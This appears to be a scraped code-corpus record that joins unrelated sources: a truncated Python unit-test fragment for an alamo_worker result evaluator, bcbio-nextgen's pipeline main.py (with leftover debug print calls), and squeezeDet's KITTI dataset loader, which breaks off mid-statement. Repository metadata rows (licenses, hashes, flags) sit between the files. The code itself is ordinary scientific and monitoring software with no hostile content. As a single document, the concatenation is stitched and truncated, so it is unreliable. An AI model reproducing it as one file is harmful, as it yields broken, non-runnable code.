test_evaluate_multiple_failed_results_with_strict_fail(self, stats): rule = 'check1.status_code != 200 AND check2.status_code != 200' plugin_results = [ HttpResult('check1', 404, status=RESULT_UNKNOWN), HttpResult('check2', 404, status=RESULT_OK), ] evaluator = ResultEvaluator() result = evaluator.evaluate(self.get_payload(rule), plugin_results) expected = { 'status': RESULT_UNKNOWN, 'hysteresis': 0, 'message': '', 'http_response_body': '', } self.assertEqual(result['triggers'][0]['result'], expected) @mock.patch('alamo_worker.plugins.evaluate.aiostats') def test_evaluate_multiple_different_results(self, stats): rule = 'check1.status_code != 200 AND check2.status_code != 200' plugin_results = [ HttpResult('check1', 404, status=RESULT_OK), HttpResult('check2', 200, status=RESULT_OK), ] evaluator = ResultEvaluator() result = evaluator.evaluate(self.get_payload(rule), plugin_results) expected = { 'status': RESULT_OK, 'message': '', 'hysteresis': RESULT_OK, 'http_response_body': '', } self.assertEqual(result['triggers'][0]['result'], expected) @mock.patch('alamo_worker.plugins.evaluate.aiostats') @mock.patch.object(GraphiteResult, 'build_meta') def test_evaluate_multiple_sources_with_diff_statuses_and_one_is_unknown( self, *args ): plugin_results = [ GraphiteResult('check_first', {'a': [5]}, ), # this result is unknown GraphiteResult('check_second', {}), ] payload = { 'id': 999, 'triggers': [ {'rule': 'check_first.values < 1'}, {'rule': 'check_second.values < 200'}, ] } result = ResultEvaluator().evaluate(payload, plugin_results) expected = { 'status': RESULT_OK, 'message': '', 'hysteresis': RESULT_OK, } self.assertEqual(result['triggers'][0]['result'], expected) self.assertEqual(result['triggers'][1]['result'], { 'status': RESULT_UNKNOWN, 'message': ('Metric not found in `check_second` source, ' 'check your query'), 'hysteresis': RESULT_OK, }) @mock.patch('alamo_worker.plugins.evaluate.aiostats') @mock.patch.object(GraphiteResult, 'build_meta') def test_evaluation_build_proper_target_for_trigger(self, *args): plugin_results = [ GraphiteResult('foo', {'foo': [1, 2, 3]}, metric='stats.test.foo'), GraphiteResult('bar', {'bar': [1, 2, 3]}, metric='stats.test.bar'), GraphiteResult('baz', {'baz': [1, 2, 3]}, metric='stats.test.baz'), ] trigger = {'rule': 'foo.values > 10 OR bar.values > 10'} payload = { 'id': 999, 'triggers': [trigger] } ResultEvaluator().evaluate(payload, plugin_results) expected = { 'status': RESULT_OK, 'message': '', 'hysteresis': RESULT_OK } self.assertEqual(trigger['result'], expected) self.assertEqual(trigger['target'], 'stats.test.bar,stats.test.foo') @mock.patch('alamo_worker.plugins.evaluate.aiostats') def test_evaluate_invalid_rule(self, stats): rule = 'cat dog' plugin_results = [ HttpResult('check', 200), ] evaluator = ResultEvaluator() result = evaluator.evaluate(self.get_payload(rule), plugin_results) expected = { 'status': RESULT_UNKNOWN, 'message': '', 'hysteresis': RESULT_OK, 'http_response_body': '', } self.assertEqual(result['triggers'][0]['result'], expected) stats.increment.incr.assert_called_once_with( 'manager.warnings.invalid_rule') @mock.patch('alamo_worker.plugins.evaluate.aiostats') def test_evaluate_failed_plugin_result(self, stats): rule = 'check.status_code != 200' content = 'some content' plugin_results = [ HttpResult('check', 200, status=RESULT_FAILED, message='some message', content=content), ] evaluator = ResultEvaluator() result = evaluator.evaluate(self.get_payload(rule), plugin_results) expected = { 'status': RESULT_FAILED, 'message': 'some message', 'hysteresis': RESULT_OK, 'http_response_body': content } expected_meta = { 'links': { 'trigger_url': {'href': 'http://some.url', 'type': 'link'} }, } self.assertEqual(result['triggers'][0]['result'], expected) self.assertEqual(result['triggers'][0]['meta'], expected_meta) @mock.patch('alamo_worker.plugins.evaluate.aiostats') def test_evaluate_unknown_plugin_result(self, stats): rule = 'druid.histogram_90 > 70000' plugin_results = [ DruidResult('druid', [], status=RESULT_UNKNOWN, message='Unknown Message'), ] evaluator = ResultEvaluator() result = evaluator.evaluate(self.get_payload(rule), plugin_results) expected = { 'status': RESULT_UNKNOWN, 'message': 'Unknown Message', 'hysteresis': RESULT_OK } self.assertEqual( result['triggers'][0]['result'], expected ) @mock.patch('alamo_worker.plugins.evaluate.aiostats') @mock.patch.object(GraphiteResult, 'build_meta') def test_evaluate_successful_graphite_result(self, mock_build_meta, stats): rule = 'check.values > 6' plugin_results = [ GraphiteResult('check', {'bunny.a': [1, 2, 3], 'bunny.b': [4, 5]}), ] evaluator = ResultEvaluator() result = evaluator.evaluate(self.get_payload(rule), plugin_results) expected_result = { 'status': RESULT_OK, 'message': '', 'hysteresis': RESULT_OK } expected_meta = { 'links': { 'trigger_url': {'href': 'http://some.url', 'type': 'link'} } } self.assertEqual(result['triggers'][0]['result'], expected_result) self.assertEqual(result['triggers'][0]['meta'], expected_meta) @mock.patch('alamo_worker.plugins.evaluate.aiostats') @mock.patch.object(GraphiteResult, 'build_meta') def test_evaluate_failed_graphite_result(self, mock_build_meta, stats): rule = 'check.values > 2' plugin_results = [ GraphiteResult( 'check', OrderedDict([('bunny.a', [1, 2, 3]), ('bunny.b', [4, 5])]) ), ] evaluator = ResultEvaluator() result = evaluator.evaluate(self.get_payload(rule), plugin_results) expected_result = { 'status': RESULT_FAILED, 'message': 'Check failed for rule `check.values > 2` which ' "evaluates to `{'bunny.a': [3], 'bunny.b': [4, 5]}`", 'hysteresis': RESULT_OK } expected_meta = { 'failed_metrics': {'bunny.a': [3], 'bunny.b': [4, 5]}, 'links': { 'trigger_url': {'href': 'http://some.url', 'type': 'link'} } } self.assertEqual(result['triggers'][0]['result'], expected_result) self.assertEqual(result['triggers'][0]['meta'], expected_meta) @mock.patch('alamo_worker.plugins.evaluate.aiostats') def test_evaluate_successful_prometheus_result(self, stats): rule = 'check.values > 2' plugin_results = [ PrometheusResult( 'check', {(('__name__', 'metric1'),): [0, 1]}, RESULT_OK, '', 2 ), ] evaluator = ResultEvaluator() result = evaluator.evaluate(self.get_payload(rule), plugin_results) expected = { 'status': RESULT_OK, 'message': '', 'hysteresis': RESULT_OK } self.assertEqual(result['triggers'][0]['result'], expected) @mock.patch('alamo_worker.plugins.evaluate.aiostats') def test_evaluate_failed_prometheus_result(self, stats): rule = 'check.values > 2' plugin_results = [ PrometheusResult( 'check', {(('__name__', 'metric1'),): [1, 2, 3]}, RESULT_OK, '', 2 ), ] evaluator = ResultEvaluator() result = evaluator.evaluate(self.get_payload(rule), plugin_results) expected_result = { 'status': RESULT_FAILED, 'message': ( 'Check failed for rule `check.values > 2` ' 'which evaluates to `{((\'__name__\', \'metric1\'),): [3]}`' ), 'hysteresis': RESULT_OK } expected_meta = { 'failed_metrics': {"(('__name__', 'metric1'),)": [3]}, 'links': { 'trigger_url': {'href': 'http://some.url', 'type': 'link'} } } self.assertEqual(result['triggers'][0]['result'], expected_result) self.assertEqual(result['triggers'][0]['meta'], expected_meta)
apache-2.0
7,516,206,015,066,631,000
36.251323
79
0.550884
false
vladsaveliev/bcbio-nextgen
bcbio/pipeline/main.py
1
27548
"""Main entry point for distributed next-gen sequencing pipelines. Handles running the full pipeline based on instructions """ from __future__ import print_function from collections import defaultdict import copy import os import sys import resource import tempfile import toolz as tz from bcbio import log, heterogeneity, hla, structural, utils from bcbio.cwl.inspect import initialize_watcher from bcbio.distributed import prun from bcbio.distributed.transaction import tx_tmpdir from bcbio.log import logger, DEFAULT_LOG_DIR from bcbio.ngsalign import alignprep from bcbio.pipeline import datadict as dd from bcbio.pipeline import (archive, config_utils, disambiguate, region, run_info, qcsummary, rnaseq) from bcbio.provenance import profile, system from bcbio.variation import (ensemble, genotype, population, validate, joint, peddy) from bcbio.chipseq import peaks, atac def run_main(workdir, config_file=None, fc_dir=None, run_info_yaml=None, parallel=None, workflow=None): """Run variant analysis, handling command line options. """ # Set environment to standard to use periods for decimals and avoid localization locale_to_use = utils.get_locale() os.environ["LC_ALL"] = locale_to_use os.environ["LC"] = locale_to_use os.environ["LANG"] = locale_to_use workdir = utils.safe_makedir(os.path.abspath(workdir)) os.chdir(workdir) config, config_file = config_utils.load_system_config(config_file, workdir) parallel = log.create_base_logger(config, parallel) log.setup_local_logging(config, parallel) logger.info(f"System YAML configuration: {os.path.abspath(config_file)}.") logger.info(f"Locale set to {locale_to_use}.") if config.get("log_dir", None) is None: config["log_dir"] = os.path.join(workdir, DEFAULT_LOG_DIR) if parallel["type"] in ["local", "clusterk"]: _setup_resources() _run_toplevel(config, config_file, workdir, parallel, fc_dir, run_info_yaml) elif parallel["type"] == "ipython": assert parallel["scheduler"] is not None, "IPython parallel requires a specified scheduler (-s)" if parallel["scheduler"] != "sge": assert parallel["queue"] is not None, "IPython parallel requires a specified queue (-q)" elif not parallel["queue"]: parallel["queue"] = "" _run_toplevel(config, config_file, workdir, parallel, fc_dir, run_info_yaml) else: raise ValueError("Unexpected type of parallel run: %s" % parallel["type"]) def _setup_resources(): """Attempt to increase resource limits up to hard limits. This allows us to avoid out of file handle limits where we can move beyond the soft limit up to the hard limit. """ target_procs = 10240 cur_proc, max_proc = resource.getrlimit(resource.RLIMIT_NPROC) target_proc = min(max_proc, target_procs) if max_proc > 0 else target_procs resource.setrlimit(resource.RLIMIT_NPROC, (max(cur_proc, target_proc), max_proc)) cur_hdls, max_hdls = resource.getrlimit(resource.RLIMIT_NOFILE) target_hdls = min(max_hdls, target_procs) if max_hdls > 0 else target_procs resource.setrlimit(resource.RLIMIT_NOFILE, (max(cur_hdls, target_hdls), max_hdls)) def _run_toplevel(config, config_file, work_dir, parallel, fc_dir=None, run_info_yaml=None): """ Run toplevel analysis, processing a set of input files. config_file -- Main YAML configuration file with system parameters fc_dir -- Directory of fastq files to process run_info_yaml -- YAML configuration file specifying inputs to process """ dirs = run_info.setup_directories(work_dir, fc_dir, config, config_file) config_file = os.path.join(dirs["config"], os.path.basename(config_file)) pipelines, config = _pair_samples_with_pipelines(run_info_yaml, config) system.write_info(dirs, parallel, config) with tx_tmpdir(config if parallel.get("type") == "local" else None) as tmpdir: tempfile.tempdir = tmpdir for pipeline, samples in pipelines.items(): for xs in pipeline(config, run_info_yaml, parallel, dirs, samples): pass # ## Generic pipeline framework def _wres(parallel, progs, fresources=None, ensure_mem=None): """Add resource information to the parallel environment on required programs and files. Enables spinning up required machines and operating in non-shared filesystem environments. progs -- Third party tools used in processing fresources -- Required file-based resources needed. These will be transferred on non-shared filesystems. ensure_mem -- Dictionary of required minimum memory for programs used. Ensures enough memory gets allocated on low-core machines. """ parallel = copy.deepcopy(parallel) parallel["progs"] = progs if fresources: parallel["fresources"] = fresources if ensure_mem: parallel["ensure_mem"] = ensure_mem return parallel def variant2pipeline(config, run_info_yaml, parallel, dirs, samples): ## Alignment and preparation requiring the entire input file (multicore cluster) # Assign GATK supplied memory if required for post-process recalibration align_programs = ["aligner", "samtools", "sambamba"] if any(tz.get_in(["algorithm", "recalibrate"], utils.to_single_data(d)) in [True, "gatk"] for d in samples): align_programs.append("gatk") with prun.start(_wres(parallel, align_programs, (["reference", "fasta"], ["reference", "aligner"], ["files"])), samples, config, dirs, "multicore", multiplier=alignprep.parallel_multiplier(samples)) as run_parallel: with profile.report("organize samples", dirs): samples = run_parallel("organize_samples", [[dirs, config, run_info_yaml, [x[0]["description"] for x in samples]]]) with profile.report("alignment preparation", dirs): samples = run_parallel("prep_align_inputs", samples) samples = run_parallel("disambiguate_split", [samples]) with profile.report("alignment", dirs): samples = run_parallel("process_alignment", samples) samples = disambiguate.resolve(samples, run_parallel) samples = alignprep.merge_split_alignments(samples, run_parallel) with profile.report("callable regions", dirs): samples = run_parallel("prep_samples", [samples]) samples = run_parallel("postprocess_alignment", samples) samples = run_parallel("combine_sample_regions", [samples]) samples = run_parallel("calculate_sv_bins", [samples]) samples = run_parallel("calculate_sv_coverage", samples) samples = run_parallel("normalize_sv_coverage", [samples]) samples = region.clean_sample_data(samples) with profile.report("hla typing", dirs): samples = hla.run(samples, run_parallel) ## Variant calling on sub-regions of the input file (full cluster) with prun.start(_wres(parallel, ["gatk", "picard", "variantcaller"]), samples, config, dirs, "full", multiplier=region.get_max_counts(samples), max_multicore=1) as run_parallel: with profile.report("alignment post-processing", dirs): samples = region.parallel_prep_region(samples, run_parallel) with profile.report("variant calling", dirs): samples = genotype.parallel_variantcall_region(samples, run_parallel) STEP(samples) with profile.report("joint squaring off/backfilling", dirs): samples = joint.square_off(samples, run_parallel) ## Finalize variants, BAMs and population databases (per-sample multicore cluster) with prun.start(_wres(parallel, ["gatk", "gatk-vqsr", "snpeff", "bcbio_variation", "gemini", "samtools", "fastqc", "sambamba", "bcbio-variation-recall", "qsignature", "svcaller", "kraken", "preseq"]), samples, config, dirs, "multicore2", multiplier=structural.parallel_multiplier(samples)) as run_parallel: with profile.report("variant post-processing", dirs): samples = run_parallel("postprocess_variants", samples) STEP(samples) samples = run_parallel("split_variants_by_sample", samples) with profile.report("prepped BAM merging", dirs): samples = region.delayed_bamprep_merge(samples, run_parallel) with profile.report("validation", dirs): samples = run_parallel("compare_to_rm", samples) samples = genotype.combine_multiple_callers(samples) with profile.report("ensemble calling", dirs): samples = ensemble.combine_calls_parallel(samples, run_parallel) STEP(samples) with profile.report("validation summary", dirs): samples = validate.summarize_grading(samples) with profile.report("structural variation", dirs): samples = structural.run(samples, run_parallel, "initial") STEP(samples) with profile.report("structural variation", dirs): samples = structural.run(samples, run_parallel, "standard") STEP(samples) with profile.report("structural variation ensemble", dirs): samples = structural.run(samples, run_parallel, "ensemble") STEP(samples) with profile.report("structural variation validation", dirs): samples = run_parallel("validate_sv", samples) STEP(samples) with profile.report("heterogeneity", dirs): samples = heterogeneity.run(samples, run_parallel) STEP(samples) with profile.report("population database", dirs): samples = population.prep_db_parallel(samples, run_parallel) STEP(samples) with profile.report("peddy check", dirs): samples = peddy.run_peddy_parallel(samples, run_parallel) with profile.report("quality control", dirs): samples = qcsummary.generate_parallel(samples, run_parallel) STEP(samples) with profile.report("archive", dirs): samples = archive.compress(samples, run_parallel) STEP(samples) with profile.report("upload", dirs): samples = run_parallel("upload_samples", samples) for sample in samples: run_parallel("upload_samples_project", [sample]) logger.info("Timing: finished") return samples def _debug_samples(i, samples): print("---", i, len(samples)) for sample in (utils.to_single_data(x) for x in samples): print(" ", sample["description"], sample.get("region"), \ utils.get_in(sample, ("config", "algorithm", "variantcaller")), \ utils.get_in(sample, ("config", "algorithm", "jointcaller")), \ utils.get_in(sample, ("metadata", "batch")), \ [x.get("variantcaller") for x in sample.get("variants", [])], \ sample.get("work_bam"), \ sample.get("vrn_file")) def STEP(samples, title=None): if title: print(title + ':') import pprint pprint.pprint([(s[0]['description'], s[0]['metadata']['phenotype'], str(s[0]['config']['algorithm']['qc'])) for s in samples]) def standardpipeline(config, run_info_yaml, parallel, dirs, samples): ## Alignment and preparation requiring the entire input file (multicore cluster) with prun.start(_wres(parallel, ["aligner", "samtools", "sambamba"]), samples, config, dirs, "multicore") as run_parallel: with profile.report("organize samples", dirs): samples = run_parallel("organize_samples", [[dirs, config, run_info_yaml, [x[0]["description"] for x in samples]]]) with profile.report("alignment", dirs): samples = run_parallel("process_alignment", samples) with profile.report("callable regions", dirs): samples = run_parallel("prep_samples", [samples]) samples = run_parallel("postprocess_alignment", samples) samples = run_parallel("combine_sample_regions", [samples]) samples = region.clean_sample_data(samples) ## Quality control with prun.start(_wres(parallel, ["fastqc", "qsignature", "kraken", "gatk", "samtools", "preseq"]), samples, config, dirs, "multicore2") as run_parallel: with profile.report("quality control", dirs): samples = qcsummary.generate_parallel(samples, run_parallel) with profile.report("upload", dirs): samples = run_parallel("upload_samples", samples) for sample in samples: run_parallel("upload_samples_project", [sample]) logger.info("Timing: finished") return samples def rnaseqpipeline(config, run_info_yaml, parallel, dirs, samples): samples = rnaseq_prep_samples(config, run_info_yaml, parallel, dirs, samples) with prun.start(_wres(parallel, ["aligner", "picard", "samtools"], ensure_mem={"tophat": 10, "tophat2": 10, "star": 2, "hisat2": 8}), samples, config, dirs, "alignment", multiplier=alignprep.parallel_multiplier(samples)) as run_parallel: with profile.report("alignment", dirs): samples = run_parallel("disambiguate_split", [samples]) samples = run_parallel("process_alignment", samples) with prun.start(_wres(parallel, ["samtools", "cufflinks"]), samples, config, dirs, "rnaseqcount") as run_parallel: with profile.report("disambiguation", dirs): samples = disambiguate.resolve(samples, run_parallel) with profile.report("transcript assembly", dirs): samples = rnaseq.assemble_transcripts(run_parallel, samples) with profile.report("estimate expression (threaded)", dirs): samples = rnaseq.quantitate_expression_parallel(samples, run_parallel) with prun.start(_wres(parallel, ["dexseq", "express"]), samples, config, dirs, "rnaseqcount-singlethread", max_multicore=1) as run_parallel: with profile.report("estimate expression (single threaded)", dirs): samples = rnaseq.quantitate_expression_noparallel(samples, run_parallel) samples = rnaseq.combine_files(samples) with prun.start(_wres(parallel, ["gatk", "vardict"]), samples, config, dirs, "rnaseq-variation") as run_parallel: with profile.report("RNA-seq variant calling", dirs): samples = rnaseq.rnaseq_variant_calling(samples, run_parallel) with prun.start(_wres(parallel, ["samtools", "fastqc", "qualimap", "kraken", "gatk", "preseq"], ensure_mem={"qualimap": 4}), samples, config, dirs, "qc") as run_parallel: with profile.report("quality control", dirs): samples = qcsummary.generate_parallel(samples, run_parallel) with profile.report("upload", dirs): samples = run_parallel("upload_samples", samples) for sample in samples: run_parallel("upload_samples_project", [sample]) with profile.report("bcbioRNAseq loading", dirs): tools_on = dd.get_in_samples(samples, dd.get_tools_on) bcbiornaseq_on = tools_on and "bcbiornaseq" in tools_on if bcbiornaseq_on and len(samples) < 3: logger.warn("bcbioRNASeq needs at least three samples total, skipping.") else: run_parallel("run_bcbiornaseqload", [sample]) logger.info("Timing: finished") return samples def fastrnaseqpipeline(config, run_info_yaml, parallel, dirs, samples): samples = rnaseq_prep_samples(config, run_info_yaml, parallel, dirs, samples) ww = initialize_watcher(samples) with prun.start(_wres(parallel, ["samtools"]), samples, config, dirs, "fastrnaseq") as run_parallel: with profile.report("fastrnaseq", dirs): samples = rnaseq.fast_rnaseq(samples, run_parallel) ww.report("fastrnaseq", samples) samples = rnaseq.combine_files(samples) with profile.report("quality control", dirs): samples = qcsummary.generate_parallel(samples, run_parallel) ww.report("qcsummary", samples) with profile.report("upload", dirs): samples = run_parallel("upload_samples", samples) for samples in samples: run_parallel("upload_samples_project", [samples]) logger.info("Timing: finished") return samples def singlecellrnaseqpipeline(config, run_info_yaml, parallel, dirs, samples): samples = rnaseq_prep_samples(config, run_info_yaml, parallel, dirs, samples) with prun.start(_wres(parallel, ["samtools", "rapmap"]), samples, config, dirs, "singlecell-rnaseq") as run_parallel: with profile.report("singlecell-rnaseq", dirs): samples = rnaseq.singlecell_rnaseq(samples, run_parallel) with profile.report("quality control", dirs): samples = qcsummary.generate_parallel(samples, run_parallel) with profile.report("upload", dirs): samples = run_parallel("upload_samples", samples) for samples in samples: run_parallel("upload_samples_project", [samples]) logger.info("Timing: finished") return samples def smallrnaseqpipeline(config, run_info_yaml, parallel, dirs, samples): # causes a circular import at the top level from bcbio.srna.group import report as srna_report samples = rnaseq_prep_samples(config, run_info_yaml, parallel, dirs, samples) with prun.start(_wres(parallel, ["aligner", "picard", "samtools"], ensure_mem={"bowtie": 8, "bowtie2": 8, "star": 2}), [samples[0]], config, dirs, "alignment") as run_parallel: with profile.report("prepare", dirs): samples = run_parallel("seqcluster_prepare", [samples]) with profile.report("seqcluster alignment", dirs): samples = run_parallel("srna_alignment", [samples]) with prun.start(_wres(parallel, ["aligner", "picard", "samtools"], ensure_mem={"tophat": 10, "tophat2": 10, "star": 2, "hisat2": 8}), samples, config, dirs, "alignment_samples", multiplier=alignprep.parallel_multiplier(samples)) as run_parallel: with profile.report("alignment", dirs): samples = run_parallel("process_alignment", samples) with prun.start(_wres(parallel, ["picard", "miraligner"]), samples, config, dirs, "annotation") as run_parallel: with profile.report("small RNA annotation", dirs): samples = run_parallel("srna_annotation", samples) with prun.start(_wres(parallel, ["seqcluster", "mirge"], ensure_mem={"seqcluster": 8}), [samples[0]], config, dirs, "cluster") as run_parallel: with profile.report("cluster", dirs): samples = run_parallel("seqcluster_cluster", [samples]) with prun.start(_wres(parallel, ["picard", "fastqc"]), samples, config, dirs, "qc") as run_parallel: with profile.report("quality control", dirs): samples = qcsummary.generate_parallel(samples, run_parallel) with profile.report("report", dirs): srna_report(samples) with profile.report("upload", dirs): samples = run_parallel("upload_samples", samples) for sample in samples: run_parallel("upload_samples_project", [sample]) return samples def chipseqpipeline(config, run_info_yaml, parallel, dirs, samples): with prun.start(_wres(parallel, ["aligner", "picard"]), samples, config, dirs, "multicore", multiplier=alignprep.parallel_multiplier(samples)) as run_parallel: with profile.report("organize samples", dirs): samples = run_parallel("organize_samples", [[dirs, config, run_info_yaml, [x[0]["description"] for x in samples]]]) with profile.report("alignment", dirs): samples = run_parallel("prepare_sample", samples) samples = run_parallel("trim_sample", samples) samples = run_parallel("disambiguate_split", [samples]) samples = run_parallel("process_alignment", samples) with profile.report("disambiguation", dirs): samples = disambiguate.resolve(samples, run_parallel) samples = run_parallel("clean_chipseq_alignment", samples) with prun.start(_wres(parallel, ["peakcaller"]), samples, config, dirs, "peakcalling", multiplier = peaks._get_multiplier(samples)) as run_parallel: with profile.report("peakcalling", dirs): samples = peaks.peakcall_prepare(samples, run_parallel) samples = peaks.call_consensus(samples) samples = run_parallel("run_chipseq_count", samples) samples = peaks.create_peaktable(samples) with prun.start(_wres(parallel, ["picard", "fastqc"]), samples, config, dirs, "qc") as run_parallel: with profile.report("quality control", dirs): samples = qcsummary.generate_parallel(samples, run_parallel) samples = atac.create_ataqv_report(samples) with profile.report("upload", dirs): samples = run_parallel("upload_samples", samples) for sample in samples: run_parallel("upload_samples_project", [sample]) logger.info("Timing: finished") return samples def wgbsseqpipeline(config, run_info_yaml, parallel, dirs, samples): with prun.start(_wres(parallel, ["fastqc", "picard"], ensure_mem={"fastqc" : 4}), samples, config, dirs, "trimming") as run_parallel: with profile.report("organize samples", dirs): samples = run_parallel("organize_samples", [[dirs, config, run_info_yaml, [x[0]["description"] for x in samples]]]) samples = run_parallel("prepare_sample", samples) samples = run_parallel("trim_bs_sample", samples) with prun.start(_wres(parallel, ["aligner", "bismark", "picard", "samtools"]), samples, config, dirs, "multicore", multiplier=alignprep.parallel_multiplier(samples)) as run_parallel: with profile.report("alignment", dirs): samples = run_parallel("process_alignment", samples) with prun.start(_wres(parallel, ['samtools']), samples, config, dirs, 'deduplication') as run_parallel: with profile.report('deduplicate', dirs): samples = run_parallel('deduplicate_bismark', samples) with prun.start(_wres(parallel, ["caller"], ensure_mem={"caller": 5}), samples, config, dirs, "multicore2", multiplier=24) as run_parallel: with profile.report("cpg calling", dirs): samples = run_parallel("cpg_calling", samples) # with prun.start(_wres(parallel, ["picard", "fastqc", "samtools"]), # samples, config, dirs, "qc") as run_parallel: # with profile.report("quality control", dirs): # samples = qcsummary.generate_parallel(samples, run_parallel) return samples def rnaseq_prep_samples(config, run_info_yaml, parallel, dirs, samples): """ organizes RNA-seq and small-RNAseq samples, converting from BAM if necessary and trimming if necessary """ pipeline = dd.get_in_samples(samples, dd.get_analysis) trim_reads_set = any([tz.get_in(["algorithm", "trim_reads"], d) for d in dd.sample_data_iterator(samples)]) resources = ["picard"] needs_trimming = (_is_smallrnaseq(pipeline) or trim_reads_set) if needs_trimming: resources.append("atropos") with prun.start(_wres(parallel, resources), samples, config, dirs, "trimming", max_multicore=1 if not needs_trimming else None) as run_parallel: with profile.report("organize samples", dirs): samples = run_parallel("organize_samples", [[dirs, config, run_info_yaml, [x[0]["description"] for x in samples]]]) samples = run_parallel("prepare_sample", samples) if needs_trimming: with profile.report("adapter trimming", dirs): if _is_smallrnaseq(pipeline): samples = run_parallel("trim_srna_sample", samples) else: samples = run_parallel("trim_sample", samples) return samples def _get_pipeline(item): from bcbio.log import logger analysis_type = item.get("analysis", "").lower() if analysis_type not in SUPPORTED_PIPELINES: logger.error("Cannot determine which type of analysis to run, " "set in the run_info under details.") sys.exit(1) else: return SUPPORTED_PIPELINES[analysis_type] def _pair_samples_with_pipelines(run_info_yaml, config): """Map samples defined in input file to pipelines to run. """ samples = config_utils.load_config(run_info_yaml) if isinstance(samples, dict): resources = samples.pop("resources") samples = samples["details"] else: resources = {} ready_samples = [] for sample in samples: if "files" in sample: del sample["files"] # add any resources to this item to recalculate global configuration usample = copy.deepcopy(sample) usample.pop("algorithm", None) if "resources" not in usample: usample["resources"] = {} for prog, pkvs in resources.items(): if prog not in usample["resources"]: usample["resources"][prog] = {} if pkvs is not None: for key, val in pkvs.items(): usample["resources"][prog][key] = val config = config_utils.update_w_custom(config, usample) sample["resources"] = {} ready_samples.append(sample) paired = [(x, _get_pipeline(x)) for x in ready_samples] d = defaultdict(list) for x in paired: d[x[1]].append([x[0]]) return d, config SUPPORTED_PIPELINES = {"variant2": variant2pipeline, "snp calling": variant2pipeline, "variant": variant2pipeline, "standard": standardpipeline, "minimal": standardpipeline, "rna-seq": rnaseqpipeline, "smallrna-seq": smallrnaseqpipeline, "chip-seq": chipseqpipeline, "wgbs-seq": wgbsseqpipeline, "fastrna-seq": fastrnaseqpipeline, "scrna-seq": singlecellrnaseqpipeline} def _is_smallrnaseq(pipeline): return pipeline.lower() == "smallrna-seq"
mit
4,928,597,947,818,260,000
50.204461
130
0.619864
false
BichenWuUCB/squeezeDet
src/dataset/kitti.py
1
10284
# Author: Bichen Wu (bichen@berkeley.edu) 08/25/2016 """Image data base class for kitti""" import cv2 import os import numpy as np import subprocess from dataset.imdb import imdb from utils.util import bbox_transform_inv, batch_iou class kitti(imdb): def __init__(self, image_set, data_path, mc): imdb.__init__(self, 'kitti_'+image_set, mc) self._image_set = image_set self._data_root_path = data_path self._image_path = os.path.join(self._data_root_path, 'training', 'image_2') self._label_path = os.path.join(self._data_root_path, 'training', 'label_2') self._classes = self.mc.CLASS_NAMES self._class_to_idx = dict(zip(self.classes, xrange(self.num_classes))) # a list of string indices of images in the directory self._image_idx = self._load_image_set_idx() # a dict of image_idx -> [[cx, cy, w, h, cls_idx]]. x,y,w,h are not divided by # the image width and height self._rois = self._load_kitti_annotation() ## batch reader ## self._perm_idx = None self._cur_idx = 0 # TODO(bichen): add a random seed as parameter self._shuffle_image_idx() self._eval_tool = './src/dataset/kitti-eval/cpp/evaluate_object' def _load_image_set_idx(self): image_set_file = os.path.join( self._data_root_path, 'ImageSets', self._image_set+'.txt') assert os.path.exists(image_set_file), \ 'File does not exist: {}'.format(image_set_file) with open(image_set_file) as f: image_idx = [x.strip() for x in f.readlines()] return image_idx def _image_path_at(self, idx): image_path = os.path.join(self._image_path, idx+'.png') assert os.path.exists(image_path), \ 'Image does not exist: {}'.format(image_path) return image_path def _load_kitti_annotation(self): def _get_obj_level(obj): height = float(obj[7]) - float(obj[5]) + 1 truncation = float(obj[1]) occlusion = float(obj[2]) if height >= 40 and truncation <= 0.15 and occlusion <= 0: return 1 elif height >= 25 and truncation <= 0.3 and occlusion <= 1: return 2 elif height >= 25 and truncation <= 0.5 and occlusion <= 2: return 3 else: return 4 idx2annotation = {} for index in self._image_idx: filename = os.path.join(self._label_path, index+'.txt') with open(filename, 'r') as f: lines = f.readlines() f.close() bboxes = [] for line in lines: obj = line.strip().split(' ') try: cls = self._class_to_idx[obj[0].lower().strip()] except: continue if self.mc.EXCLUDE_HARD_EXAMPLES and _get_obj_level(obj) > 3: continue xmin = float(obj[4]) ymin = float(obj[5]) xmax = float(obj[6]) ymax = float(obj[7]) assert xmin >= 0.0 and xmin <= xmax, \ 'Invalid bounding box x-coord xmin {} or xmax {} at {}.txt' \ .format(xmin, xmax, index) assert ymin >= 0.0 and ymin <= ymax, \ 'Invalid bounding box y-coord ymin {} or ymax {} at {}.txt' \ .format(ymin, ymax, index) x, y, w, h = bbox_transform_inv([xmin, ymin, xmax, ymax]) bboxes.append([x, y, w, h, cls]) idx2annotation[index] = bboxes return idx2annotation def evaluate_detections(self, eval_dir, global_step, all_boxes): """Evaluate detection results. Args: eval_dir: directory to write evaluation logs global_step: step of the checkpoint all_boxes: all_boxes[cls][image] = N x 5 arrays of [xmin, ymin, xmax, ymax, score] Returns: aps: array of average precisions. names: class names corresponding to each ap """ det_file_dir = os.path.join( eval_dir, 'detection_files_{:s}'.format(global_step), 'data') if not os.path.isdir(det_file_dir): os.makedirs(det_file_dir) for im_idx, index in enumerate(self._image_idx): filename = os.path.join(det_file_dir, index+'.txt') with open(filename, 'wt') as f: for cls_idx, cls in enumerate(self._classes): dets = all_boxes[cls_idx][im_idx] for k in xrange(len(dets)): f.write( '{:s} -1 -1 0.0 {:.2f} {:.2f} {:.2f} {:.2f} 0.0 0.0 0.0 0.0 0.0 ' '0.0 0.0 {:.3f}\n'.format( cls.lower(), dets[k][0], dets[k][1], dets[k][2], dets[k][3], dets[k][4]) ) cmd = self._eval_tool + ' ' \ + os.path.join(self._data_root_path, 'training') + ' ' \ + os.path.join(self._data_root_path, 'ImageSets', self._image_set+'.txt') + ' ' \ + os.path.dirname(det_file_dir) + ' ' + str(len(self._image_idx)) print('Running: {}'.format(cmd)) status = subprocess.call(cmd, shell=True) aps = [] names = [] for cls in self._classes: det_file_name = os.path.join( os.path.dirname(det_file_dir), 'stats_{:s}_ap.txt'.format(cls)) if os.path.exists(det_file_name): with open(det_file_name, 'r') as f: lines = f.readlines() assert len(lines) == 3, \ 'Line number of {} should be 3'.format(det_file_name) aps.append(float(lines[0].split('=')[1].strip())) aps.append(float(lines[1].split('=')[1].strip())) aps.append(float(lines[2].split('=')[1].strip())) else: aps.extend([0.0, 0.0, 0.0]) names.append(cls+'_easy') names.append(cls+'_medium') names.append(cls+'_hard') return aps, names def do_detection_analysis_in_eval(self, eval_dir, global_step): det_file_dir = os.path.join( eval_dir, 'detection_files_{:s}'.format(global_step), 'data') det_error_dir = os.path.join( eval_dir, 'detection_files_{:s}'.format(global_step), 'error_analysis') if not os.path.exists(det_error_dir): 